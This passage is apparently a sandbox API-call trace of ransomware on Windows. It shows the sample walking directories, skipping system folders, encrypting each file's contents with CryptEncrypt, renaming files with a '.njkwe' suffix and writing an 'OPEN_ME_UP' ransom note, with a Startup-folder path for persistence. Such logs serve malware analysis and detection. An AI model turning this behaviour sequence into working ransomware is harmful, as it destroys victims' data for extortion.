"c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu_r00t_{3sxle5}.njkwe")) returned 1 [0064.427] GetProcessHeap () returned 0xbe0000 [0064.427] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.427] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0064.427] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="Windows") returned 1 [0064.427] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="$Recycle.bin") returned 1 [0064.427] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="System Volume Information") returned 1 [0064.427] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="Program Files") returned 1 [0064.427] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="Program Files (x86)") returned 1 [0064.427] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 59 [0064.427] StrStrIW (lpFirst="Windows6.0-KB956250-v6001-x86.msu", lpSrch=".njkwe") returned 0x0 [0064.427] lstrcmpW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.427] lstrcmpW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="taridd") returned 1 [0064.427] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.427] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.427] GetTickCount () returned 0x115083a [0064.427] GetTickCount () returned 0x115083a [0064.427] GetTickCount () returned 0x115083a [0064.427] GetTickCount () returned 0x115083a [0064.427] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.427] GetProcessHeap () returned 0xbe0000 [0064.428] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.428] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.430] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.430] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.430] GetProcessHeap () returned 0xbe0000 [0064.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.430] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.430] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.433] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.433] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.433] CloseHandle (hObject=0x428) returned 1 [0064.610] GetProcessHeap () returned 0xbe0000 [0064.610] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.610] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu_r00t_{3sXlE5}.njkwe") returned 79 [0064.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu_r00t_{3sxle5}.njkwe")) returned 1 [0064.611] GetProcessHeap () returned 0xbe0000 [0064.611] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.612] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0064.612] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="Windows") returned 1 [0064.612] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="$Recycle.bin") returned 1 [0064.612] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="System Volume Information") returned 1 [0064.612] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="Program Files") returned 1 [0064.612] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="Program Files (x86)") returned 1 [0064.612] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 59 [0064.612] StrStrIW (lpFirst="Windows6.1-KB958488-v6001-x64.msu", lpSrch=".njkwe") returned 0x0 [0064.612] lstrcmpW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.612] lstrcmpW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="taridd") returned 1 [0064.612] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.612] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.612] GetTickCount () returned 0x1150905 [0064.612] GetTickCount () returned 0x1150905 [0064.612] GetTickCount () returned 0x1150905 [0064.612] GetTickCount () returned 0x1150905 [0064.612] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.612] GetProcessHeap () returned 0xbe0000 [0064.612] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.612] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.616] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.616] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.616] GetProcessHeap () returned 0xbe0000 [0064.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.616] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.616] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.618] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.618] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.618] CloseHandle (hObject=0x428) returned 1 [0064.840] GetProcessHeap () returned 0xbe0000 [0064.840] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.840] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu_r00t_{3sXlE5}.njkwe") returned 79 [0064.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu_r00t_{3sxle5}.njkwe")) returned 1 [0064.841] GetProcessHeap () returned 0xbe0000 [0064.841] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.841] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0064.841] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="Windows") returned 1 [0064.841] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="$Recycle.bin") returned 1 [0064.841] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="System Volume Information") returned 1 [0064.841] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="Program Files") returned 1 [0064.841] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="Program Files (x86)") returned 1 [0064.841] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 59 [0064.841] StrStrIW (lpFirst="Windows6.1-KB958488-v6001-x86.msu", lpSrch=".njkwe") returned 0x0 [0064.841] lstrcmpW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.841] lstrcmpW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="taridd") returned 1 [0064.841] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.841] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.841] GetTickCount () returned 0x11509e0 [0064.841] GetTickCount () returned 0x11509e0 [0064.841] GetTickCount () returned 0x11509e0 [0064.841] GetTickCount () returned 0x11509e0 [0064.841] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.841] GetProcessHeap () returned 0xbe0000 [0064.841] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.841] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.846] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.846] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.846] GetProcessHeap () returned 0xbe0000 [0064.846] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.846] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.846] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.849] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.849] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.849] CloseHandle (hObject=0x428) returned 1 [0064.944] GetProcessHeap () returned 0xbe0000 [0064.944] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.944] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu_r00t_{3sXlE5}.njkwe") returned 79 [0064.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu_r00t_{3sxle5}.njkwe")) returned 1 [0064.945] GetProcessHeap () returned 0xbe0000 [0064.945] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.945] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0064.945] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0064.945] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 57 [0064.945] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0064.945] WriteFile (in: hFile=0x424, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380fa74, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380fa74*=0x351, lpOverlapped=0x0) returned 1 [0064.947] CloseHandle (hObject=0x424) returned 1 [0064.947] GetProcessHeap () returned 0xbe0000 [0064.947] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc263f8 | out: hHeap=0xbe0000) returned 1 [0064.947] FindNextFileW (in: hFindFile=0xc19720, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0064.947] lstrcmpiW (lpString1="Boot", lpString2="Windows") returned -1 [0064.947] lstrcmpiW (lpString1="Boot", lpString2="$Recycle.bin") returned 1 [0064.947] lstrcmpiW (lpString1="Boot", lpString2="System Volume Information") returned -1 [0064.947] lstrcmpiW (lpString1="Boot", lpString2="Program Files") returned -1 [0064.947] lstrcmpiW (lpString1="Boot", lpString2="Program Files (x86)") returned -1 [0064.947] wnsprintfW (in: pszDest=0xc47aa0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0064.947] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0064.947] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0064.947] lstrcmpW (lpString1="\\\\?\\C:\\Boot", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0064.948] GetProcessHeap () returned 0xbe0000 [0064.948] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc263f8 [0064.948] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0064.948] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19c60 [0064.948] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.948] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.948] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.948] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.949] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.949] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0064.949] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.949] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0064.949] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0064.949] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0064.949] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.949] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\." (normalized: "c:\\boot\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.949] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0064.949] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.949] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.949] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.949] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.949] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.950] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0064.950] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.950] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0064.950] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0064.950] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0064.950] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.950] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.950] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xac3efa99, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xac3efa99, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BCD", cAlternateFileName="")) returned 1 [0064.950] lstrcmpiW (lpString1="BCD", lpString2="Windows") returned -1 [0064.950] lstrcmpiW (lpString1="BCD", lpString2="$Recycle.bin") returned 1 [0064.950] lstrcmpiW (lpString1="BCD", lpString2="System Volume Information") returned -1 [0064.950] lstrcmpiW (lpString1="BCD", lpString2="Program Files") returned -1 [0064.950] lstrcmpiW (lpString1="BCD", lpString2="Program Files (x86)") returned -1 [0064.950] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0064.950] StrStrIW (lpFirst="BCD", lpSrch=".njkwe") returned 0x0 [0064.950] lstrcmpW (lpString1="BCD", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.950] lstrcmpW (lpString1="BCD", lpString2="taridd") returned -1 [0064.950] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BCD", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.950] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.950] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, 